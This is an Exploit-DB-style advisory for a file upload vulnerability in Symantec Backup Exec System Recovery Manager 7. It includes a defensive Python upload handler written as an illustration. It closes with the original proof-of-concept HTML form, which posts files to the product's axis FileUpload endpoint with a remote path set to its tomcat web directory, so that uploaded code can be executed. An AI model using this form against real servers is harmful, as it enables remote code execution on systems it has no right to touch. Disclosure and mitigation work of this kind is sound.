Vendor: Backup Exec System Recovery Manager
By: BastardLabs
CVSS: 9.3 (HIGH)
Vulnerability Type: File Upload
CWE: 434
Product Name: Backup Exec System Recovery Manager
Affected Version From: 7
Affected Version To: 7
Patch Exists: NO
Related CWE: N/A
CPE: a:symantec:backup_exec_system_recovery_manager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

File Upload POC

This vulnerability allows remote attackers to upload arbitrary files to the affected application. It exists because the application does not validate the type of the uploaded file, so an attacker can upload and then execute arbitrary code on the affected system.

Mitigation:

The application should validate the file type of the uploaded file and only allow files of the expected type to be uploaded.
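A server-side upload handler that applies this mitigation, added here as an illustration and not code from Symantec or from the original advisory. It enforces an extension allowlist and a text-only content check, and it also discards the client-chosen destination directory that the POC's "path" form field carries (the POC points it at the tomcat WebApps directory); the upload root, allowed extensions and size cap are assumed values for the example.

```python
import os
from pathlib import PureWindowsPath

# Assumed settings for this illustration (not the product's own values).
UPLOAD_ROOT = "/srv/besr/uploads"        # fixed by the server, never taken from the request
ALLOWED_EXTENSIONS = {".log", ".txt"}    # the only types this endpoint expects
MAX_BYTES = 8 * 1024 * 1024


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the caller answers with 400."""


def sanitize_filename(client_name: str) -> str:
    """Keep only the final path component of whatever the client sent.
    PureWindowsPath splits on both '\\' and '/', so a value such as
    'C:\\x\\..\\axis/evil.jsp' reduces to 'evil.jsp' before the type check."""
    name = PureWindowsPath(client_name).name
    if not name or name in {".", ".."} or any(ord(c) < 32 for c in name):
        raise UploadRejected("empty or malformed filename")
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"file type {ext or '(none)'} not allowed")
    return name


def validate_content(data: bytes) -> None:
    """Log uploads must be reasonably sized UTF-8 text with no NUL bytes."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    if b"\x00" in data:
        raise UploadRejected("binary content in a text upload")
    try:
        data.decode("utf-8")
    except UnicodeDecodeError as exc:
        raise UploadRejected("upload is not UTF-8 text") from exc


def handle_upload(path_field: str, filename: str, data: bytes) -> str:
    """Return the validated destination for an upload.
    'path_field' mirrors the POC's 'path' form field and is deliberately ignored:
    the destination directory is fixed server-side, outside any servlet container,
    so even a file that slips past the type check is never served or executed."""
    del path_field
    name = sanitize_filename(filename)
    validate_content(data)
    root = os.path.realpath(UPLOAD_ROOT)
    dest = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, dest]) != root:   # defence in depth
        raise UploadRejected("destination escapes upload root")
    return dest
```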

Exploit-DB raw data:

<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
  <head><title>File Upload POC</title></head>
  <body>
    <h2>Backup Exec System Recovery Manager 7.0<br/>File Upload POC</h2>
    <form action="https://<TARGET>:8443/axis/FileUpload" method="post"
          enctype="multipart/form-data">
      Remote Path: <input name="path" size="100" type="text"
        value="C:\Program Files\Symantec\Backup Exec System Recovery\Manager\Services\tomcat\WebApps\axis"/><br/>
      File to upload: <input name="log_file" type="file"/><br/>
      <hr/>
      <p><input type="submit"/><input type="reset"/></p>
    </form>
    (c)BastardLabs 2008.
  </body>
</html>

# milw0rm.com [2008-02-07]